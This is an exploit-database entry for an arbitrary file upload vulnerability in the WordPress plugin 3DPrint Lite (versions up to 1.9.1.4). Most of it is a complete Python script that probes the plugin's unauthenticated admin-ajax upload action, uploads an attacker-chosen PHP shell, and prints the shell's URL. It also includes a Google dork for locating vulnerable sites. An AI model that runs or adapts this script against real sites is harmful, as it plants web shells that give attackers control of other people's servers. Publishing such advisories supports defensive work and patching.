WordPress 3DPrint Lite 1.9.1.4 Shell Upload

2021.09.23
Credit: spacehen
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/3dprint-lite/ # Date: 22/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/ # Version: <= 1.9.1.4 # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload") print("Author -> spacehen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("jsonrpc" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'p3dlite_handle_upload' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'file' : open(file_path)} print("Uploading Shell..."); response = requests.post(uri, files=files) file_name = path.basename(file_path) if(file_name in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + "wp-content/uploads/p3d/" + file_name); else: print("Shell Upload Failed") sys.exit(1) main();


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top